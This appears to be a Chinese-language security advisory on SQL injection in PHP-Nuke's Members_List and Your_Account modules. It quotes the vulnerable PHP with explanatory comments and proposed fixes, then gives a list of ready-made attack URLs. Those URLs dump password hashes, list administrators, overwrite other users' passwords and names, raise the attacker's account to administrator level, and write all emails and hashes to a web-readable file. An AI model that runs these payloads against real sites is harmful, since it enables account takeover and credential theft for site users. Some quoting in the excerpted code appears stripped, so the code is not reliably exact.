Members_List、Your_Account模块中存在SQL注入缺陷。当magic_quotes_gpc选项为“OFF”时，攻击者可使用下列攻击方法及代码利用该缺陷。PHP代码/位置：
?/modules/Members_List/index.php : ------------------------------------------------------------------------[...]/* Members_List: the listing query is assembled by string concatenation from the request values $letter, $sortby, $min and $max; no escaping, casting or allow-listing of them is visible in this excerpt. Single quotes appear to have been stripped from the SQL literals during extraction (e.g. around Anonymous and the LIKE pattern), so the quoting shown is not necessarily the original's. */$count = "SELECT COUNT(uid) AS total FROM ".$user_prefix."_users ";$select = "select uid, name, uname, femail, url from ".$user_prefix."_users ";$where = "where uname != Anonymous ";if ( ( $letter != "Other" ) AND ( $letter != "All" ) ) {$where .= "AND uname like ".$letter."% ";/* $letter is concatenated into the LIKE pattern; the != "Other"/"All" tests pick a branch but do not constrain its content */} else if ( ( $letter == "Other" ) AND ( $letter != "All" ) ) {/* the second condition is always true once the first holds */$where .= "AND uname REGEXP \"^\[1-9]\" ";} else {$where .= "";}$sort = "order by $sortby";/* $sortby is interpolated verbatim; an ORDER BY column name cannot be bound as a query parameter, so the defence is an allow-list of permitted column names */$limit = " ASC LIMIT ".$min.", ".$max;/* $min and $max should be cast to int before use as LIMIT operands */$count_result = sql_query($count.$where, $dbi);$num_rows_per_order = mysql_result($count_result,0,0);$result = sql_query($select.$where.$sort.$limit, $dbi) or die();/* or die() with no message: a failing query ends the page silently */echo "<br>";if ( $letter != "front" ) {echo "<table width=\"100%\" border=\"0\" cellspacing=\"1\"><tr>\n";echo "<td BGCOLOR=\"$bgcolor4\" align=\"center\"><font color=\"$textcolor2\"><b>"._NICKNAME."</b></font></td>\n";echo "<td BGCOLOR=\"$bgcolor4\" align=\"center\"><font color=\"$textcolor2\"><b>"._REALNAME."</b></font></td>\n";echo "<td BGCOLOR=\"$bgcolor4\" align=\"center\"><font color=\"$textcolor2\"><b>"._EMAIL."</b></font></td>\n";echo "<td BGCOLOR=\"$bgcolor4\" align=\"center\"><font color=\"$textcolor2\"><b>"._URL."</b></font></td>\n";$cols = 4;[...]------------------------------------------------------------------------/modules/Your_Account/index.php :/* Your_Account dispatcher: each $op handler is called with request-supplied variables ($uname, $uid, $theme, ...); where they are populated from (register_globals, presumably) is outside this excerpt */switch($op) {[...]case "mailpasswd":mail_password($uname, $code);break;case "userinfo":userinfo($uname, $bypass, $hid, $url);break;case "login":login($uname, $pass);break;[...]case "saveuser":saveuser($uid, $realname, $uname, $email, $femail, $url, $pass, $vpass, $bio, $user_avatar, $user_icq, $user_occ, $user_from, $user_intrest, $user_sig, $user_aim, $user_yim, $user_msnm, $attach, $newsletter);break;[...]case "savehome":savehome($uid, $uname, $storynum, $ublockon, $ublock, $broadcast, $popmeson);break;case "savetheme":savetheme($uid, $theme);break;[...]case 
"savecomm":savecomm($uid, $uname, $umode, $uorder, $thold, $noscore, $commentmax);break;[...]}------------------------------------------------------------------------/modules/Your_Account/index.php :[...]/* saveuser: stores a profile edit for $uid. Ownership is checked by re-reading the cookie's uname/pass from the DB and comparing with the submitted $uid; every other argument is then interpolated straight into the UPDATE. No return value; ends with a redirect. */function saveuser($uid, $realname, $uname, $email, $femail, $url, $pass, $vpass, $bio, $user_avatar, $user_icq, $user_occ, $user_from, $user_intrest, $user_sig, $user_aim, $user_yim, $user_msnm, $attach, $newsletter) {global $user, $Cookie, $userinfo, $EditedMessage, $user_prefix, $dbi, $module_name;Cookiedecode($user);/* $Cookie[1] is used as the uname and $Cookie[2] is compared with the stored pass; Cookiedecode() itself is not shown */$check = $Cookie[1];$check2 = $Cookie[2];$result = sql_query("select uid, pass from ".$user_prefix."_users where uname=$check", $dbi);/* the cookie-derived $check is interpolated directly into the lookup */list($vuid, $ccpass) = sql_fetch_row($result, $dbi);if (($uid == $vuid) AND ($check2 == $ccpass)) {/* loose == comparisons. This gate only establishes that the caller owns $uid; it does not restrict what the SET values below may contain, so the trailing where uid=$uid is not by itself a bound on what the UPDATE touches */if (!eregi("http://";, $url)) {/* the stray ";" inside the eregi() call looks like an extraction artifact of "http://" */$url = "http://$url";}if ((isset($pass)) && ("$pass" != "$vpass")) {echo "<center>"._PASSDIFFERENT."</center>";} elseif (($pass != "") && (strlen($pass) < $minpass)) {/* $minpass is not in the global list above, so inside this function it is undefined (null); strlen($pass) < null is never true and this minimum-length check cannot fire — TODO confirm against the full file */echo "<center>"._YOUPASSMUSTBE." <b>$minpass</b> "._CHARLONG."</center>";} else {if ($bio) { filter_text($bio); $bio = $EditedMessage; $bio = FixQuotes($bio); }/* $bio is the only field routed through filter_text()/FixQuotes() */if ($pass != "") {Cookiedecode($user);sql_query("LOCK TABLES ".$user_prefix."_users WRITE", $dbi);$pass = md5($pass);/* unsalted MD5; password_hash()/password_verify() is the modern replacement */sql_query("update ".$user_prefix."_users set name=$realname, email=$email, femail=$femail, url=$url, pass=$pass, bio=$bio , user_avatar=$user_avatar, user_icq=$user_icq, user_occ=$user_occ, user_from=$user_from, user_intrest=$user_intrest, user_sig=$user_sig, user_aim=$user_aim, user_yim=$user_yim, user_msnm=$user_msnm, newsletter=$newsletter where uid=$uid", $dbi);/* every SET value is interpolated without escaping or type checks. The fix is prepared statements (or, with this legacy API, per-field intval()/escaping and an explicit column list); magic_quotes_gpc only escapes quote characters and is not a defence for unquoted contexts */$result = sql_query("select uid, uname, pass, storynum, umode, uorder, thold, noscore, ublockon, theme from ".$user_prefix."_users where uname=$uname and pass=$pass", $dbi);/* the re-login uses the submitted $uname rather than the cookie-verified $check */if(sql_num_rows($result, $dbi)==1) {$userinfo = sql_fetch_array($result, $dbi);
doCookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],$userinfo[theme],$userinfo[commentmax]);/* the session cookie is rebuilt from the fresh row and carries the stored password hash ($userinfo[pass]); a random session identifier would keep the hash out of the cookie. Bare-word keys (uid, uname, ...) rely on the undefined-constant-to-string fallback. */} else {echo "<center>"._SOMETHINGWRONG."</center><br>";}sql_query("UNLOCK TABLES", $dbi);} else {sql_query("update ".$user_prefix."_users set name=$realname, email=$email, femail=$femail, url=$url, bio=$bio, user_avatar=$user_avatar, user_icq=$user_icq, user_occ=$user_occ, user_from=$user_from, user_intrest=$user_intrest, user_sig=$user_sig, user_aim=$user_aim, user_yim=$user_yim, user_msnm=$user_msnm, newsletter=$newsletter where uid=$uid", $dbi);/* same unescaped UPDATE as above, minus the pass column */if ($attach) {$a = 1;} else {$a = 0;}/* $a is never read in this excerpt */}Header("Location: modules.php?name=$module_name");/* no exit() after the redirect header */}}}[...]/* savehome: stores home-page preferences for $uid behind the same cookie/uid gate as saveuser. $ublockon is normalised to 0/1 and $ublock goes through FixQuotes(); $storynum, $broadcast and $popmeson are interpolated unquoted. $uname is accepted but unused here. */function savehome($uid, $uname, $storynum, $ublockon, $ublock, $broadcast, $popmeson) {global $user, $Cookie, $userinfo, $user_prefix, $dbi, $module_name;Cookiedecode($user);$check = $Cookie[1];$check2 = $Cookie[2];$result = sql_query("select uid, pass from ".$user_prefix."_users where uname=$check", $dbi);list($vuid, $ccpass) = sql_fetch_row($result, $dbi);if (($uid == $vuid) AND ($check2 == $ccpass)) {if(isset($ublockon)) $ublockon=1; else $ublockon=0;$ublock = FixQuotes($ublock);sql_query("update ".$user_prefix."_users set storynum=$storynum, ublockon=$ublockon, ublock=$ublock, broadcast=$broadcast, popmeson=$popmeson where uid=$uid", $dbi);/* none of storynum/broadcast/popmeson is validated before interpolation; each should be cast or escaped according to its column type — TODO check the schema */getusrinfo($user);doCookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],$userinfo[theme],$userinfo[commentmax]);Header("Location: modules.php?name=$module_name");}}/* savetheme: stores the theme preference for $uid behind the same cookie/uid gate; $theme is interpolated unquoted into the UPDATE and then echoed into the Location header. */function savetheme($uid, $theme) {global $user, $Cookie, $userinfo, $user_prefix, $dbi, $module_name;Cookiedecode($user);$check = $Cookie[1];$check2 = $Cookie[2];$result = sql_query("select uid, pass from ".$user_prefix."_users where uname=$check", $dbi);list($vuid, $ccpass) = sql_fetch_row($result, $dbi);if 
(($uid == $vuid) AND ($check2 == $ccpass)) {sql_query("update ".$user_prefix."_users set theme=$theme where uid=$uid", $dbi);/* theme=$theme is an unquoted interpolation: cast to int or validate against the installed theme list; escaping quote characters alone would not bound this value */getusrinfo($user);doCookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],$userinfo[theme],$userinfo[commentmax]);Header("Location: modules.php?name=$module_name&theme=$theme");/* $theme is also placed in the Location header without urlencode() */}}[...]/* savecomm: stores comment-display preferences for $uid behind the same cookie/uid gate; $noscore is normalised to 0/1, while $umode, $uorder, $thold and $commentmax are interpolated unquoted. $uname is accepted but unused here. */function savecomm($uid, $uname, $umode, $uorder, $thold, $noscore, $commentmax) {global $user, $Cookie, $userinfo, $user_prefix, $dbi, $module_name;Cookiedecode($user);$check = $Cookie[1];$check2 = $Cookie[2];$result = sql_query("select uid, pass from ".$user_prefix."_users where uname=$check", $dbi);list($vuid, $ccpass) = sql_fetch_row($result, $dbi);if (($uid == $vuid) AND ($check2 == $ccpass)) {if(isset($noscore)) $noscore=1; else $noscore=0;sql_query("update ".$user_prefix."_users set umode=$umode, uorder=$uorder, thold=$thold, noscore=$noscore, commentmax=$commentmax where uid=$uid", $dbi);getusrinfo($user);doCookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],$userinfo[theme],$userinfo[commentmax]);Header("Location: modules.php?name=$module_name");}}[...]------------------------------------------------------------------------/modules/Your_Account/index.php :[...]/* mail_password: password-reminder lookup keyed on the submitted $uname, which is interpolated directly into a SELECT that also returns pass. The body continues past the [...] cut, so what is done with the row is not visible; sql_query() is a wrapper not shown here, so whether a zero-row result is falsy for the if(!$result) test depends on it. */function mail_password($uname, $code) {global $sitename, $adminmail, $nukeurl, $user_prefix, $dbi, $module_name;$result = sql_query("select email, pass from ".$user_prefix."_users where (uname=$uname)", $dbi);if(!$result) {include("header.php");OpenTable();echo "<center>"._SORRYNOUSERINFO."</center>";CloseTable();include("footer.php");[...]------------------------------------------------------------------------------------------------------------------------------------------------[...]/* userinfo: profile display for $uname, which is interpolated directly into the SELECT below; that SELECT also fetches the pass column. Body continues past the cut. */function userinfo($uname, $bypass=0, $hid=0, $url=0) {global $user, $Cookie, $sitename, 
$prefix, $user_prefix, $dbi, $admin, $broadcast_msg, $my_headlines, $module_name;$result = sql_query("select uid, femail, url, bio, user_avatar, user_icq, user_aim, user_yim, user_msnm, user_from, user_occ, user_intrest, user_sig, pass, newsletter from ".$user_prefix."_users where uname=$uname", $dbi);/* uname=$uname: unescaped request value; the column list includes pass — fetch only what the page renders */$userinfo = sql_fetch_array($result, $dbi);[...]------------------------------------------------------------------------
------------------------------------------------------------------------[...]/* login: looks up the row for the submitted $uname (interpolated directly) and fetches it, including pass, into the global $setinfo; the password comparison, if any, is past the [...] cut. */function login($uname, $pass) {global $setinfo, $user_prefix, $dbi, $module_name;$result = sql_query("select pass, uid, storynum, umode, uorder, thold, noscore, ublockon, theme, commentmax from ".$user_prefix."_users where uname=$uname", $dbi);$setinfo = sql_fetch_array($result, $dbi);[...]}[...]------------------------------------------------------------------------
Members_List模块: - 显示用户:http://[target]/modules.php?name=Members_List&letter=All&sortby=pass - 显示用户:http://[target]/modules.php?name=Members_List&letter=All&sortby=uid - 显示moderators :http://[target]/modules.php?name=Members_List&letter= OR user_level=2/* - 显示管理员:http://[target]/modules.php?name=Members_List&letter= OR user_level=4/* - 显示所有以“abc”开头的用户 :http://[target]/modules.php?name=Members_List&letter= OR pass LIKE abc%/* Your_Account模块 : - 将“Admind”用户更名为“Hophophop” :http://[target]/modules.php?name=Your_Account&op=savetheme&theme=,name=Hophophop where uname=Admin/*&uid=[OUR_UID] - 在md5_decrypted中将“Bob”的密码改为“d41d8cd98f00b204e9800998ecf8427e”:http://[target]/modules.php?name=Your_Account&op=savetheme&theme=,pass=d41d8cd98f00b204e9800998ecf8427e where uname=Bob/*&uid=[OUR_UID] 或:http://[target]/modules.php?name=Your_Account&op=saveuser&realname=,pass=d41d8cd98f00b204e9800998ecf8427e where uname=Bob/*&uid=[OUR_UID] 或:http://[target]/modules.php?name=Your_Account&op=saveuser&email=,pass=d41d8cd98f00b204e9800998ecf8427e where uname=Bob/*&uid=[OUR_UID] 或:http://[target]/modules.php?name=Your_Account&op=savehome&storynum=,pass=d41d8cd98f00b204e9800998ecf8427e where uname=Bob/*&uid=[OUR_UID] 或:http://[target]/modules.php?name=Your_Account&op=savehome&ublockon=,pass=d41d8cd98f00b204e9800998ecf8427e where uname=Bob/*&uid=[OUR_UID] 或:http://[target]/modules.php?name=Your_Account&op=savecomm&umode=,pass=d41d8cd98f00b204e9800998ecf8427e where uname=Bob/*&uid=[OUR_UID] 或:http://[target]/modules.php?name=Your_Account&op=savecomm&thold=,pass=d41d8cd98f00b204e9800998ecf8427e where uname=Bob/*&uid=[OUR_UID] - 将普通用户提升至管理员权限:http://[target]/modules.php?name=Your_Account&op=savetheme&theme=,user_level=4&uid=[OUR_UID] 或:http://[target]/modules.php?name=Your_Account&op=saveuser&femail=,user_level=4&uid=[OUR_UID] 或:http://[target]/modules.php?name=Your_Account&op=saveuser&url=http://,user_level=4&uid=[OUR_UID] 
或:http://[target]/modules.php?name=Your_Account&op=savehome&broadcast=,user_level=4&uid=[OUR_UID] 或:http://[target]/modules.php?name=Your_Account&op=savecomm&uorder=,user_level=4&uid=[OUR_UID] - 将所有用户的电子邮件和crypted密码保存在http://[target]/AllMailPass.txt中 :http://[target]/modules.php?name=Your_Account&op=mailpasswd&uname=) OR 1=1 INTO OUTFILE /[path/to/site]/AllMailPass.txt/* 利用Cookie发送crypted密码能访问用户帐户。 - 将用户的所有信息保存在http://[target]/admintxt中:http://[target]/modules.php?name=Your_Account&op=login&uname= OR%user_level>1 INTO OUTFILE /[path/to/site]/admin.txt[path/to/site]能在http://[target]/modules/Forums/bb_smilies.php中查询到。